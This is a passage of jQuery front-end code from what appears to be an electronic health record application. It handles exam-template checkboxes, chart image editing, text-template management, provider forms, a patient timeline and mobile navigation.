			var parent_id_entry1 = parent_id1.substring(0,n1);
			$("#" + parent_id_entry1 + "_form").find("input.pe_normal:checkbox").each(function(){
				$(this).prop("checked",true);
			});
			updateTextArea_pe(parent_id_entry1);
			$("#" + parent_id_entry1 + '_form input[type="checkbox"]').button('refresh');
		}).button('refresh');
		$("#" + parent_id_entry).find(".all_normal2_pe").each(function(){
			$(this).prop("checked",true);
			var parent_id2 = $(this).attr("id");
			var parent_id_entry2 = parent_id2.replace('_normal1','');
			var old2 = $("#" + parent_id_entry2).val();
			var a2 = $(this).val();
			if (old2 != '') { var b2 = old2 + ' ' + a2; } else { var b2 = a2; }
			$("#" + parent_id_entry2).val(b2);
		}).button('refresh');
	} else {
		$("#" + parent_id_entry).find(".all_normal_pe").each(function(){
			$(this).prop("checked",false);
			var parent_id2 = $(this).attr("id");
			var n2 = parent_id2.lastIndexOf('_');
			var parent_id_entry2 = parent_id2.substring(0,n2);
			$("#" + parent_id_entry2).val('');
			$("#" + parent_id_entry2 + "_form").find('input.pe_normal:checkbox').each(function(){
				$(this).prop("checked",false);
			});
			$("#" + parent_id_entry2 + '_form input[type="checkbox"]').button('refresh');
		}).button('refresh');
		$("#" + parent_id_entry).find(".all_normal2_pe").each(function(){
			// bug fix: this branch runs when the master box is UNchecked and strips
			// the normal text back out below, so the box must be cleared as well
			// (the original set it to true here, presumably a copy-paste slip)
			$(this).prop("checked",false);
			var parent_id2 = $(this).attr("id");
			var parent_id_entry2 = parent_id2.replace('_normal1','');
			var old2 = $("#" + parent_id_entry2).val();
			var a2 = $(this).val();
			var a3 = ' ' +
a2; var c2 = old2.replace(a3,''); c2 = c2.replace(a2, ''); $("#" + parent_id_entry2).val(c2); }).button('refresh'); } $("#"+parent_id_entry).find('.pe_entry').each(function(){ var parent_id1 = $(this).attr("id"); if (!!$(this).val()) { $('#' + parent_id1 + '_h').html(noshdata.item_present); } else { $('#' + parent_id1 + '_h').html(noshdata.item_empty); } }); }); $(document).on("click", ".all_normal2_pe", function(){ var parent_id = $(this).attr("id"); var parent_id_entry = parent_id.replace('_normal1',''); var old = $("#" + parent_id_entry).val(); var a = $(this).val(); if ($(this).is(':checked')) { if (old != '') { var b = old + ' ' + a; } else { var b = a; } $("#" + parent_id_entry).val(b); } else { var a1 = ' ' + a; var c = old.replace(a1,''); c = c.replace(a, ''); $("#" + parent_id_entry).val(c); } }); $(document).on("click", ".all_normal3_pe", function(){ var a = $(this).is(':checked'); var parent_id = $(this).attr("id"); var parent_id_entry = parent_id.replace('_normal1',''); $.ajax({ type: "POST", url: "ajaxencounter/all-normal/pe/" + parent_id_entry, dataType: 'json', success: function(data){ var message = ''; $.each(data, function(key, value){ if(a){ $("#" + key).val(value); message = "All normal values set!"; } else { $("#" + key).val(''); message = "All normal values cleared!"; } }); $.jGrowl(message); $("#"+parent_id_entry+"_dialog").find('.pe_entry').each(function(){ var parent_id1 = $(this).attr("id"); if (!!$(this).val()) { $('#' + parent_id1 + '_h').html(noshdata.item_present); } else { $('#' + parent_id1 + '_h').html(noshdata.item_empty); } }); } }); }); function loadimagepreview(){ $('#image_placeholder').html(''); $('#image_placeholder').empty(); var image_total = ''; $.ajax({ url: "ajaxchart/image-load", type: "POST", success: function(data){ $('#image_placeholder').html(data); image_total = $("#image_placeholder img").length; var $image = $("#image_placeholder img"); $image.tooltip(); $image.first().show(); var i = 1; $("#image_status").html('Image ' + i + ' of ' + image_total); $('#next_image').click(function () { var $next = $image.filter(':visible').hide().next('img'); i++; if($next.length === 0) { $next = $image.first(); i = 1; } $next.show(); $("#image_status").html('Image ' + i + ' of ' + image_total); }); $('#prev_image').click(function () { var $prev = $image.filter(':visible').hide().prev('img'); i--; if($prev.length === 0) { $next = $image.last(); i = image_total; } $prev.show(); $("#image_status").html('Image ' + i + ' of ' + image_total); }); } }); } $(document).on('click', '#edit_image', function () { var image = $("#image_placeholder img").filter(':visible').attr('src'); var image_id1 = $("#image_placeholder img").filter(':visible').attr('id'); var image_id = image_id1.replace('_image', ''); $('#wPaint').css({ width: document.getElementById(image_id1).naturalWidth, height: document.getElementById(image_id1).naturalHeight }).wPaint('resize'); $('.wPaint-menu-name-main').css({width:579}); $('.wPaint-menu-name-text').css({width:182,left:0,top:42}); $('.wPaint-menu-select').css({"overflow-y":"scroll"}); $('#wPaint').wPaint('image', image); $.ajax({ url: "ajaxchart/image-get/" + image_id, dataType: "json", type: "POST", success: function(data){ $.each(data, function(key, value){ $("#image_form :input[name='" + key + "']").val(value); }); $("#image_dialog").dialog('open'); } }); }); $(document).on('click', "#del_image", function() { var image_id1 = $("#image_placeholder img").filter(':visible').attr('id'); var image_id = image_id1.replace('_image', ''); 
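// confirm with the user, then delete the image server-side and rebuild the preview strip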
if(confirm('Are you sure you want to delete this image?')){ $.ajax({ type: "POST", url: "ajaxchart/delete-image", data: "image_id=" + image_id, success: function(data){ $.jGrowl(data); loadimagepreview(); } }); } }); $(document).on('keydown', ':text', function(e){ if(e.keyCode==13) { e.preventDefault(); } }); $(document).on('keydown', ':password', function(e){ var a = $(this).attr('id'); if(a != 'password') { if(e.keyCode==13) { e.preventDefault(); } } }); $(document).on('keydown', '.textdump', function(e){ if(e.keyCode==39) { if(e.shiftKey==true) { e.preventDefault(); var id = $(this).attr('id'); $.ajax({ type: "POST", url: "ajaxsearch/textdump-group/" + id, success: function(data){ $("#textdump_group_html").html(''); $("#textdump_group_html").append(data); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_group_target").val(id); $("#textdump_group").dialog("option", "position", { my: 'left top', at: 'right top', of: '#'+id }); $("#textdump_group").dialog('open'); } }); } } }); $(document).on('click', '.textdump_item', function() { if ($(this).find(':first-child').hasClass("ui-state-error") == false) { $(this).find(':first-child').addClass("ui-state-error ui-corner-all"); } else { $(this).find(':first-child').removeClass("ui-state-error ui-corner-all"); } }); $(document).on('click', '.textdump_item_specific', function() { if ($(this).find(':first-child').hasClass("ui-state-error") == false) { $(this).find(':first-child').addClass("ui-state-error ui-corner-all"); } else { $(this).find(':first-child').removeClass("ui-state-error ui-corner-all"); } }); $(document).on('click', '.edittextgroup', function(e) { var id = $(this).attr('id'); var isEditable= $("#"+id+"_b").is('.editable'); $("#"+id+"_b").prop('contenteditable',!isEditable).toggleClass('editable'); if (isEditable) { var url = $("#"+id+"_b").attr('data-url'); var pk = $("#"+id+"_b").attr('data-pk'); var name = $("#"+id+"_b").attr('data-name'); var title = $("#"+id+"_b").attr('data-title'); var type = $("#"+id+"_b").attr('data-type'); var value = encodeURIComponent($("#"+id+"_b").html()); $.ajax({ type: "POST", url: url, data: 'value=' + value + "&pk=" + pk + "&name=" + name, success: function(data){ toastr.success(data); } }); $(this).html('<i class="zmdi zmdi-edit"></i>'); $(this).siblings('.deletetextgroup').show(); $(this).siblings('.restricttextgroup').show(); } else { $(this).html('<i class="zmdi zmdi-check"></i>'); $(this).siblings('.deletetextgroup').hide(); $(this).siblings('.restricttextgroup').hide(); } }); $(document).on('click', '.edittexttemplate', function(e) { var id = $(this).attr('id'); 
e.stopPropagation(); $("#"+id+"_span").editable('show', true); }); $(document).on('click', '.edittexttemplatespecific', function(e) { var id = $(this).attr('id'); e.stopPropagation(); $("#"+id+"_span").editable('show', true); }); $(document).on('click', '.deletetextgroup', function() { var id = $(this).attr('id'); var template_id = id.replace('deletetextgroup_',''); $.ajax({ type: "POST", url: "ajaxsearch/deletetextdumpgroup/" + template_id, success: function(data){ $("#textgroupdiv_"+template_id).remove(); } }); }); $(document).on('click', '.restricttextgroup', function() { var id = $(this).attr('id'); var template_id = id.replace('restricttextgroup_',''); $("#restricttextgroup_template_id").val(template_id); $.ajax({ type: "POST", url: "ajaxsearch/restricttextgroup-get/" + template_id, dataType: 'json', success: function(data){ $.each(data, function(key, value){ $("#restricttextgroup_form :input[name='" + key + "']").val(value); }); } }); $("#restricttextgroup_dialog").dialog('open'); }); $(document).on('click', '.deletetexttemplate', function() { var id = $(this).attr('id'); var template_id = id.replace('deletetexttemplate_',''); $.ajax({ type: "POST", url: "ajaxsearch/deletetextdump/" + template_id, success: function(data){ $("#texttemplatediv_"+template_id).remove(); } }); }); $(document).on('click', '.deletetexttemplatespecific', function() { var id = $(this).attr('id'); var template_id = id.replace('deletetexttemplatespecific_',''); $.ajax({ type: "POST", url: "ajaxsearch/deletetextdump/" + template_id, success: function(data){ $("#texttemplatespecificdiv_"+template_id).remove(); } }); }); $(document).on('click', '.normaltextgroup', function() { var id = $("#textdump_group_target").val(); var a = $(this).val(); var old = $("#"+id).val(); var delimiter = $("#textdump_delimiter2").val(); if (a != 'No normal values set.') { var a_arr = a.split("\n"); var d = a_arr.join(delimiter); if ($(this).prop('checked')) { if (old != '') { var b = old + '\n' + d; } else { var b = d; } $("#"+id).val(b); } else { var a1 = d + ' '; var c = old.replace(a1,''); c = c.replace(d, ''); $("#" +id).val(c); } } else { $.jGrowl(a); } }); $(document).on('click', '.normaltexttemplate', function() { var id = $(this).attr('id'); var template_id = id.replace('normaltexttemplate_',''); if ($(this).prop('checked')) { $.ajax({ type: "POST", url: "ajaxsearch/defaulttextdump/" + template_id, success: function(data){ $.jGrowl('Template marked as normal default!'); $("#textdump_group_html").html(''); $("#textdump_group_html").append(data); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); } }); } else { $.ajax({ type: 
"POST", url: "ajaxsearch/undefaulttextdump/" + template_id, success: function(data){ $.jGrowl('Template unmarked as normal default!'); $("#textdump_group_html").html(''); $("#textdump_group_html").append(data); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); } }); } }); $(document).on('keydown', '#textdump_group_add', function(e){ if(e.keyCode==13) { e.preventDefault(); var a = $("#textdump_group_add").val(); if (a != '') { var str = $("#textdump_group_form").serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxsearch/add-text-template-group", data: str, dataType: 'json', success: function(data){ $.jGrowl(data.message); var app = '<div id="textgroupdiv_' + data.id + '" style="width:99%" class="pure-g"><div class="pure-u-2-3"><input type="checkbox" id="normaltextgroup_' + data.id + '" class="normaltextgroup" value="No normal values set."><label for="normaltextgroup_' + data.id + '">Normal</label> <b id="edittextgroup_' + data.id + '_b" class="textdump_group_item textdump_group_item_text" data-type="text" data-pk="' + data.id + '" data-name="group" data-url="ajaxsearch/edit-text-template-group" data-title="Group">' + a + '</b></div><div class="pure-u-1-3" style="overflow:hidden"><div style="width:200px;"><button type="button" id="edittextgroup_' + data.id + '" class="edittextgroup">Edit</button><button type="button" id="deletetextgroup_' + data.id + '" class="deletetextgroup">Remove</button><button type="button" id="restricttextgroup_' + data.id + '" class="restricttextgroup">Restrictions</button></div></div><hr class="ui-state-default"/></div>'; $("#textdump_group_html").append(app); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_group_add").val(''); } }); } else { 
$.jGrowl("Please complete the form"); } } else { $.jGrowl("No text to add!"); } } }); $(document).on('keydown', '#textdump_add', function(e){ if(e.keyCode==13) { e.preventDefault(); var a = $("#textdump_add").val(); if (a != '') { var str = $("#textdump_form").serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxsearch/add-text-template", data: str, dataType: 'json', success: function(data){ $.jGrowl(data.message); var app = '<div id="texttemplatediv_' + data.id + '" style="width:99%" class="pure-g"><div class="textdump_item pure-u-2-3"><span id="edittexttemplate_' + data.id + '_span" class="textdump_item_text ui-state-error ui-corner-all" data-type="text" data-pk="' + data.id + '" data-name="array" data-url="ajaxsearch/edit-text-template" data-title="Item">' + a + '</span></div><div class="pure-u-1-3" style="overflow:hidden"><div style="width:400px;"><input type="checkbox" id="normaltexttemplate_' + data.id + '" class="normaltexttemplate" value="normal"><label for="normaltexttemplate_' + data.id + '">Mark as Default Normal</label><button type="button" id="edittexttemplate_' + data.id + '" class="edittexttemplate">Edit</button><button type="button" id="deletetexttemplate_' + data.id + '" class="deletetexttemplate">Remove</button></div></div><hr class="ui-state-default"/></div>'; $("#textdump_html").append(app); $(".edittexttemplate").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetexttemplate").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltexttemplate").button({text: false, icons: {primary: "ui-icon-check"}}); $('.textdump_item_text').editable('destroy'); $('.textdump_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_add").val(''); } }); } else { $.jGrowl("Please complete the form"); } } else { $.jGrowl("No text to add!"); } } }); $(document).on('keydown', '#textdump_specific_add', function(e){ if(e.keyCode==13) { e.preventDefault(); var a = $("#textdump_specific_add").val(); if (a != '') { var specific_name = $("#textdump_specific_name").val(); if (specific_name == '') { var id = $("#textdump_specific_target").val(); var start = $("#textdump_specific_start").val(); var length = $("#textdump_specific_length").val(); $("#"+id).textrange('set', start, length); $("#"+id).textrange('replace', a); $("#textdump_specific").dialog('close'); } else { var str = $("#textdump_specific_form").serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxsearch/add-specific-template", data: str, dataType: 'json', success: function(data){ $.jGrowl(data.message); var app = '<div id="texttemplatespecificdiv_' + data.id + '" style="width:99%" class="pure-g"><div class="textdump_item_specific pure-u-2-3"><span id="edittexttemplatespecific_' + data.id + '_span" class="textdump_item_specific_text ui-state-error ui-corner-all" data-type="text" data-pk="' + data.id + '" data-name="array" data-url="ajaxsearch/edit-text-template-specific" data-title="Item">' + a + '</span></div><div class="pure-u-1-3" style="overflow:hidden"><div 
style="width:400px;"><button type="button" id="edittexttemplatespecific_' + data.id + '" class="edittexttemplatespecific">Edit</button><button type="button" id="deletetexttemplatespecific_' + data.id + '" class="deletetexttemplatespecific">Remove</button></div></div><hr class="ui-state-default"/></div>'; $("#textdump_specific_html").append(app); $(".edittexttemplatespecific").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetexttemplatespecific").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".defaulttexttemplatespecific").button(); $('.textdump_item_specific_text').editable('destroy'); $('.textdump_item_specific_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_specific_add").val(''); } }); } else { $.jGrowl("Please complete the form"); } } } else { $.jGrowl("No text to add!"); } } }); $(document).on("change", "#hippa_address_id", function () { var a = $(this).find("option:selected").first().text(); if (a != 'Select Provider') { $("#hippa_provider1").val(a); } else { $("#hippa_provider1").val(''); } }); $(document).on('click', "#hippa_address_id2", function (){ var id = $("#hippa_address_id").val(); if(id){ $("#print_to_dialog").dialog("option", "title", "Edit Provider"); $.ajax({ type: "POST", url: "ajaxsearch/orders-provider1", data: "address_id=" + id, dataType: "json", success: function(data){ $.each(data, function(key, value){ $("#print_to_form :input[name='" + key + "']").val(value); }); } }); } else { $("#print_to_dialog").dialog("option", "title", "Add Provider"); } $("#print_to_origin").val('hippa'); $("#print_to_dialog").dialog('open'); }); $(document).on("change", "#hippa_request_address_id", function () { var a = $(this).find("option:selected").first().text(); if (a != 'Select Provider') { $("#hippa_request_to").val(a); } else { $("#hippa_request_to").val(''); } }); $(document).on('click', "#hippa_request_address_id2", function (){ var id = $("#hippa_request_address_id").val(); if(id){ $("#print_to_dialog").dialog("option", "title", "Edit Provider"); $.ajax({ type: "POST", url: "ajaxsearch/orders-provider1", data: "address_id=" + id, dataType: "json", success: function(data){ $.each(data, function(key, value){ $("#print_to_form :input[name='" + key + "']").val(value); }); } }); } else { $("#print_to_dialog").dialog("option", "title", "Add Provider"); } $("#print_to_origin").val('request'); $("#print_to_dialog").dialog('open'); }); $(document).on('click', '.assessment_clear', function(){ var id = $(this).attr('id'); var parts = id.split('_'); console.log(parts[2]); $("#assessment_" + parts[2]).val(''); $("#assessment_icd" + parts[2]).val(''); $("#assessment_icd" + parts[2] + "_div").html(''); $("#assessment_icd" + parts[2] + "_div_button").hide(); }); $(document).on('click', '.hedis_patient', function() { var id = $(this).attr('id'); var pid = id.replace('hedis_', ''); $.ajax({ type: "POST", url: "ajaxsearch/openchart", data: "pid=" + pid, success: function(data){ $.ajax({ type: "POST", url: "ajaxsearch/hedis-set", 
dataType: "json", success: function(data){ window.location = data.url; } }); } }); }); $(document).on('click', '.claim_associate', function() { var id = $(this).attr('id'); var form_id = id.replace('era_button_', 'era_form_'); var div_id = id.replace('era_button_', 'era_div_'); var bValid = true; $("#" + form_id).find("[required]").each(function() { var input_id = $(this).attr('id'); var id1 = $("#" + input_id); var text = $("label[for='" + input_id + "']").html(); bValid = bValid && checkEmpty(id1, text); }); if (bValid) { var str = $("#" + form_id).serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxfinancial/associate-claim", data: str, success: function(data){ $.jGrowl(data); $("#" + form_id).clearForm(); $('#' + div_id).remove(); } }); } else { $.jGrowl("Please complete the form"); } } }); function textdump(elem) { var id = $(elem).attr('id'); $.ajax({ type: "POST", url: "ajaxsearch/textdump-group/" + id, success: function(data){ $("#textdump_group_html").html(''); $("#textdump_group_html").append(data); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_group_target").val(id); $("#textdump_group").dialog("option", "position", { my: 'left top', at: 'right top', of: '#'+id }); $("#textdump_group").dialog('open'); } }); } $(document).on('click', 'textarea', function(e) { var stopCharacters = [' ', '\n', '\r', '\t', ',']; var id = $(this).attr('id'); var val = $(this).val(); $(this).html(val.replace(/[&\/\-\.]/g, 'a')); var text = $(this).html(); var start = $(this)[0].selectionStart; var end = $(this)[0].selectionEnd; while (start > 0) { if (stopCharacters.indexOf(text[start]) == -1) { --start; } else { break; } }; ++start; while (end < text.length) { if (stopCharacters.indexOf(text[end]) == -1) { ++end; } else { break; } } if (start == 1) { start = 0; } var startW = text.substr(start,1); var endW = text.substr(end-1,1); if (startW == '*' && endW == '*') { $(this).textrange('set', start, end - start); var currentWord = text.substr(start + 1, end - start - 2); if (currentWord != '') { if (currentWord == '~') { $("#textdump_specific_target").val(id); $("#textdump_specific_name").val(''); $("#textdump_specific_start").val(start); $("#textdump_specific_length").val(end - start); $("#textdump_delimiter_div").hide(); $("#textdump_specific_save").hide(); $("#textdump_specific_done").hide(); $("#textdump_specific").dialog("option", "position", { my: 'left top', at: 'right top', of: '#'+id }); $("#textdump_specific").dialog('open'); } else { $.ajax({ type: "POST", url: "ajaxsearch/textdump-specific/" + currentWord, success: function(data){ $("#textdump_specific_html").html(''); 
$("#textdump_specific_html").append(data); $(".edittexttemplatespecific").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetexttemplatespecific").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".defaulttexttemplatespecific").button(); $('.textdump_item_specific_text').editable('destroy'); $('.textdump_item_specific_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_specific_target").val(id); $("#textdump_specific_name").val(currentWord); $("#textdump_specific_start").val(start); $("#textdump_specific_length").val(end - start); $("#textdump_specific_done").hide(); $("#textdump_specific").dialog("option", "position", { my: 'left top', at: 'right top', of: '#'+id }); $("#textdump_specific").dialog('open'); } }); } } } }); $(document).on('change', '.encounter_template_group_group', function() { var id = $(this).attr('id'); var a1 = id.split("_"); var count = a1[4]; var a = $("#"+id).val(); $.ajax({ type: "POST", url: "ajaxsearch/get-template-normal-options/" + a, dataType: "json", success: function(data){ $("#encounter_template_array_id_"+count).removeOption(/./); $("#encounter_template_array_id_"+count).addOption({'':'Choose Group'}, false); $("#encounter_template_array_id_"+count).addOption(data, false); } }); }); $(document).on('click', '#autogenerate_encounter_template', function() { $('#dialog_load').dialog('option', 'title', "Autogenerating template...").dialog('open'); var str = $("#template_encounter_edit_form").serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxsearch/autogenerate-encounter-template", data: str, dataType: "json", success: function(data){ $.jGrowl(data.message); if (data.name != '') { $("#template_encounter_edit_dialog").dialog('close'); $('#dialog_load').dialog('close'); $('#dialog_load').dialog('option', 'title', "Loading template...").dialog('open'); $.ajax({ type: "POST", url: "ajaxsearch/get-encounter-templates-details", data: 'template_name='+data.name, dataType: "json", success: function(data){ $('#dialog_load').dialog('close'); $("#template_encounter_edit_div").html(data.html); loadbuttons(); $("#template_encounter_edit_dialog").dialog("option", "title", "Edit Encounter Template"); $("#template_encounter_edit_dialog").dialog('open'); } }); } } }); } }); $(document).on('click', '.remove_encounter_template_field', function() { var id = $(this).attr('id'); var a1 = id.split("_"); var count = a1[4]; $("#group_encounter_template_div_"+count).remove(); $("#array_encounter_template_div_"+count).remove(); $("#remove_encounter_template_div_"+count).remove(); }); $(document).on('click', "#timeline_chart", function() { $('#dialog_load').dialog('option', 'title', "Loading timeline...").dialog('open'); $.ajax({ type: "POST", url: "ajaxsearch/timeline", dataType: "json", success: function(data){ var json = data.json; for (var key in json) { if (json.hasOwnProperty(key)) { json[key]['startDate'] = new Date(json[key]['startDate'] * 1000); if (json[key]['endDate'] != null) { json[key]['endDate'] = new 
Date(json[key]['endDate'] * 1000); } } } $("#timeline").timeCube({ data: json, granularity: data.granular, startDate: new Date(data.start * 1000), endDate: new Date(data.end * 1000), transitionAngle: 60, transitionSpacing: 100, nextButton: $("#next-link"), previousButton: $("#prev-link"), showDate: true }); $('#dialog_load').dialog('close'); $('#timeline_dialog').dialog('open'); } }); }); $(document).on('click', '.timeline_event', function() { var type = $(this).attr('type'); var value = $(this).attr('value'); var status = $(this).attr('status'); var acl = false; if (noshdata.group_id == '2' || noshdata.group_id == '3') { acl = true; } if (type == 'eid') { if (status == 'Yes') { if (acl) { $("#encounter_view").load('ajaxchart/modal-view/' + value); } else { $.ajax({ type: "POST", url: "ajaxcommon/opennotes", success: function(data){ if (data == 'y') { $("#encounter_view").load('ajaxcommon/modal-view2/' + value); } else { $.jGrowl('You cannot view the encounter as your provider has not activated OpenNotes.'); } } }); } $("#encounter_view_dialog").dialog('open'); } else { $.jGrowl('Encounter is not signed. You cannot view it at this time.'); } } else if (type == 't_messages_id') { if (status == 'Yes') { if (acl) { $("#message_view").load('ajaxcommon/tmessages-view/' + value); $("#t_messages_id").val(value); t_messages_tags(); $("#messages_view_dialog").dialog('open'); } else { $.ajax({ type: "POST", url: "ajaxcommon/opennotes", success: function(data){ if (data == 'y') { $("#message_view").load('ajaxcommon/tmessages-view/' + value); $("#t_messages_id").val(value); $("#messages_view_dialog").dialog('open'); } else { $.jGrowl('You cannot view the message as your provider has not activated OpenNotes.'); } } }); } } else { $.jGrowl('Message is not signed. 
You cannot view it at this time.'); } } console.log(value + "," + type); }); // Mobile $(document).on('click', '.ui-title', function(e) { $("#form_item").val(''); $("#search_results").html(''); var url = $(location).attr('href'); var parts = url.split("/"); if (parts[4] == 'chart_mobile') { $.mobile.loading("show"); $.ajax({ type: "POST", url: "../ajaxchart/refresh-timeline", success: function(data){ $("#content_inner_timeline").html(data); $("#content_inner_main").show(); $("#content_inner").hide(); //refresh_timeline(); $.mobile.loading("hide"); } }); } }); $(document).on('click', '.mobile_click_home', function(e) { var classes = $(this).attr('class').split(' '); for (var i=0; i<classes.length; i++) { if (classes[i].indexOf("ui-") == -1) { if (classes[i] != 'mobile_click_home') { //console.log(classes[i]); //var link = classes[i].replace("mobile_",""); //$.mobile.loading("show"); //$.ajax({ //type: "POST", //url: "ajaxdashboard/" + link, //success: function(data){ //$("#content_inner").html(data).trigger('create').show(); //$("#content_inner_main").hide(); //$.mobile.loading("hide"); //} //}); window.location = classes[i]; break; } } } }); $(document).on('click', '.mobile_click_chart', function(e) { var classes = $(this).attr('class').split(' '); for (var i=0; i<classes.length; i++) { if (classes[i].indexOf("ui-") == -1) { if (classes[i] != 'mobile_click_chart') { console.log(classes[i]); var link = classes[i].replace("mobile_",""); $.ajax({ type: "POST", url: "../ajaxchart/" + link + "/true", success: function(data){ $("#content_inner").html(data).trigger('create').show(); $.mobile.loading("hide"); $("#content_inner_main").hide(); $("#left_panel").panel('close'); } }); break; } } } }); $(document).on('click', '.mobile_link', function(e) { $.mobile.loading("show"); $("#content").hide(); $("#chart_header").hide(); var url = $(this).attr('data-nosh-url'); var origin = $(this).attr('data-nosh-origin'); $.ajax({ type: "POST", url: url, data: 'origin=' + origin, dataType: 'json', success: function(data){ $("#navigation_header_back").attr('data-nosh-origin', origin); $("#navigation_header_save").attr('data-nosh-form', data.form); $("#navigation_header_save").attr('data-nosh-origin', origin); if (data.search != '') { $(".search_class").hide(); $("#"+data.search+"_div").show(); $("#"+data.search+"_div").find('ul').attr('data-nosh-paste-to',data.search_to); } $("#edit_content_inner").html(data.content).trigger('create'); $("#navigation_header").show(); $("#edit_content").show(); $.mobile.loading("hide"); } }); }); $(document).on('click', '#navigation_header_back', function(e) { $.mobile.loading("show"); var origin = $(this).attr('data-nosh-origin'); if (origin == 'Chart') { $("#navigation_header").hide(); $("#content_inner").hide(); $("#chart_header").show(); $("#content_inner_main").show(); $.mobile.loading("hide"); var scroll = 